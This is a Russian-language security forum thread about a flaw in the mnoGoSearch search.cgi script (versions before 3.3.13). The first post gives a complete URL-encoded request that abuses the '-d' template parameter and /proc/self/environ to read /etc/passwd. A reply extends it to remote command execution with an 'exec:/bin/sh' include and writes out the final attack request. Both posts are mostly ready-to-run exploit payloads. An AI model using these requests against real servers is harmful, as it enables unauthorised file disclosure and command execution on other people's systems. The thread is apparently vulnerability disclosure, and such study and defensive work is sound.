Старый 04.03.2013, 20:39   #1
BlackFan
 
Аватар для BlackFan
 
Регистрация: 08.07.2010
Сообщений: 354
Репутация: 402
По умолчанию mnoGoSearch search engine

mnoGoSearch search engine

Версия: < 3.3.13
Сайт: www.mnogosearch.org

Чтение произвольных файлов

Используя особенность передачи параметров CGI скрипту через QUERY_STRING без символа "=", можно определить переменную "d", отвечающую за путь к шаблону страницы.
Код:
http://host/cgi-bin/search.cgi?-d/path/to/template
Сформировав на сервере файл шаблона и указав его в переменной "d", можно реализовать чтение произвольных файлов через конструкцию шаблона
Код:
<!INCLUDE CONTENT="URI">
Подробнее о передаче параметров запуска:
http://tools.ietf.org/html/draft-rob...e-00#section-7
PHP-CGI RCE CVE-2012-1823

Пример эксплуатации

В качестве шаблона возможно использование файла "/proc/self/environ", в котором через переменную окружения PATH_INFO формируется часть шаблона.
Код:
<!--top-->
<!INCLUDE CONTENT="file:/etc/passwd">
<!--/top-->
Финальная нагрузка
Код:
http://host/cgi-bin/search.cgi/%0A
%3C!--top-%3E%0A%3C!INCLUDE%20CONTENT=%22file:/etc/passwd%22%3E%0A
%3C!--/top--%3E?-d/proc/self/environ


http://www.mnogosearch.org/bugs/index.php?id=4818
http://www.securitylab.ru/lab/PT-2013-17

Последний раз редактировалось BlackFan; 05.03.2013 в 16:53..
BlackFan вне форума   Ответить с цитированием
Старый 07.02.2014, 08:50   #2
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

ковырялся в сорцах, из уязвимости выше можно получить вполне себе нормальную рце

пейлоад:
Код:
exec:/bin/sh$IFS-c?echo;echo;id;ls\${IFS}-lia
echo;echo; нужно, чтобы был вывод на страницу

итоговый запрос:
Код:
http://host/cgi-bin/search.cgi/%0A%3C!--top-%3E%0A%3C!INCLUDE%20CONTENT=%22exec:/bin/sh$IFS-c%3fecho;echo;id;ls\${IFS}-lia%22%3E%0A%3C!--/top--%3E?-d/proc/self/environ
Andrey1800 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot